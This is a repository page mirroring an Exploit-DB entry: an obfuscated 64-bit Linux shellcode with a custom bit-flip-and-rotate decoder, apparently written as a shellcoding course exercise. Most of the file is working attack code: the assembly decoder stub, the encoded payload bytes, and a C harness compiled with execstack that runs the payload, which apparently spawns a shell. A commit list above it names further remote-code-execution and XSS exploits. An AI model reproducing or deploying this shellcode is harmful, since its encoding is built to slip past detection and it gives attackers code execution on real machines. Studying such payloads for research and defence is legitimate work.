bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/linux/51191.txt
Exploit-DB 3de26153c8 DB: 2023-04-02 
23 changes to exploits/shellcodes/ghdb

ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)

Hughes Satellite Router HX200 v8.3.1.14 -  Remote File Inclusion

Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)

TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)

GeoVision Camera GV-ADR2701 - Authentication Bypass

AD Manager Plus 7122 - Remote Code Execution (RCE)

Enlightenment v0.25.3 - Privilege escalation

Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)

Apache 2.4.x - Buffer Overflow

perfSONAR v4.4.5 - Partial Blind CSRF

SugarCRM 12.2.0 - Remote Code Execution (RCE)

XCMS v1.83 - Remote Command Execution (RCE)

Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)

GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)

AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)

NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit

Splashtop 8.71.12001.0 - Unquoted Service Path

Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)

FlipRotation v1.0 decoder - Shellcode (146 bytes)

Linux/x86 - Polymorphic linux x86 Shellcode (92 Bytes)

macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode
2023-04-02 00:16:21 +00:00

106 lines
No EOL
3.8 KiB
Text
Raw Permalink Blame History

## Exploit Title: FlipRotation v1.0 decoder - Shellcode (146 bytes)
## Exploit Author: Eduardo Silva
## Date: 2022-12-31
## Tested on: Linux x86_64 SMP Debian 4.19.260-1
## SLAE/Student ID: PA-31319
## Webpage: https://0xnibbles.github.io/
## Twitter: @0xnibbles
## Course: This shellcode was created for the x86 Assembly Language and Shellcoding on Linux (SLAE32) Course offered at pentesteracademy.com.
## Description: The inspiration for this algorithm was the known CBC bit-flipping attack but applying a simple variation to our context.
##
## More specifically, the steps are
##
## 1 - We pick each shelcode byte and flip the last bit using a xor operation - flipped_shellbyte = shellbyte ^ 0x01
## 2 - Based on that output the rotation direction is defined. We rotate right if odd or left if even. The number of rotation positions is defined by the loop index value (number of interations) of the loop at that time.
## 3 - If we rotate right we append 0x2 afther the encoded byte and if we rotate left we append 0xff
## 4 - Put the byte 0xa0 as the shellcode end marker
##
## More info at https://0xnibbles.github.io/posts/slae_32_assignment_4/ - the 64 bit version has the same logic as 32 bit
##
## Example:
## $ ./shellcode
## Shellcode Length: 146
## id
## uid=1000 ...
##
########################################################################
global _start
section .text
_start:
jmp decoder
EncodedShellcode: db 0x49,0xff,0x18,0x02,0x7,0xff,0x8a,0xff,0x94,0xff,0xd5,0x02,0xb8,0x02,0xb1,0xff,0x68,0x02,0xde,0xff,0x8b,0x02,0xc5,0x02,0x27,0x02,0x2d,0xff,0x49,0x02,0xa4,0xff,0x88,0x02,0x73,0x02,0x45,0xff,0x4a,0xff,0x88,0x02,0x7c,0xff,0x59,0x02,0xa4,0xff,0x88,0x02,0xcf,0xff,0x25,0xff,0x50,0x02,0x1c,0xff,0xd1,0x02,0x38,0x02,0x8,0x02,0xa0,0xa0 ; 0xa0 is the stop marker
decoder:
lea rsi, [rel EncodedShellcode]
lea rdi, [rsi+1] ; pointing to second byte (0x02) from shellcode
xor rax, rax
mul rax ; zeroes edx
mov al, 1
xor rcx, rcx
xor rbx, rbx
decode:
mov bl, byte [rsi + rax] ; mov parity byte to bl
xor bl, 0xa0 ; check if reached the end marker | 0xa0 ^ 0xff = 0x5f
jz short EncodedShellcode ; reached the marker if Zero Flag not set
xor bl, 0x5f ; if equal parity is even (0xff)
mov bl, byte [rsi + rdx]
jnz odd
even: ; rotate right
ror bl, cl
jmp short bitFlip
odd: ; rotate left
rol bl, cl
bitFlip:
xor bl, 0x01
restore_next_byte:
mov byte [rsi + rdx], bl ; replaces the original byte
mov bl, byte [rsi + rax+1] ; mov next shellbyte
mov byte [rdi], bl
inc rdi
add al, 2
inc dl
inc cl
; Doing circular array as modulo workaround. Use 0x08 as a divisor or circular boundary because we are rotating 8 bits (al register).
cmp cl, 0x08 ; if equal ZF will be set meaning we have a complete rotation
jnz decode ; $+2 ; jump if rotation is not complete
xor rcx, rcx ; if rotation is complete and reset cl to start again the "circular array"
jmp short decode
##############################################
// Filename: shellcode.c
// Compile: gcc -z execstack -fno-stack-protector shellcode.c -o shellcode
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x42\x49\xff\x18\x02\x07\xff\x8a\xff\x94\xff\xd5\x02\xb8\x02\xb1\xff\x68\x02\xde\xff\x8b\x02\xc5\x02\x27\x02\x2d\xff\x49\x02\xa4\xff\x88\x02\x73\x02\x45\xff\x4a\xff\x88\x02\x7c\xff\x59\x02\xa4\xff\x88\x02\xcf\xff\x25\xff\x50\x02\x1c\xff\xd1\x02\x38\x02\x08\x02\xa0\xa0\x48\x8d\x35\xb7\xff\xff\xff\x48\x8d\x7e\x01\x48\x31\xc0\x48\xf7\xe0\xb0\x01\x48\x31\xc9\x48\x31\xdb\x8a\x1c\x06\x80\xf3\xa0\x74\x9d\x80\xf3\x5f\x8a\x1c\x16\x75\x04\xd2\xcb\xeb\x02\xd2\xc3\x80\xf3\x01\x88\x1c\x16\x8a\x5c\x06\x01\x88\x1f\x48\xff\xc7\x04\x02\xfe\xc2\xfe\xc1\x80\xf9\x08\x75\xd0\x48\x31\xc9\xeb\xcb";
main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Reference in a new issue View git blame Copy permalink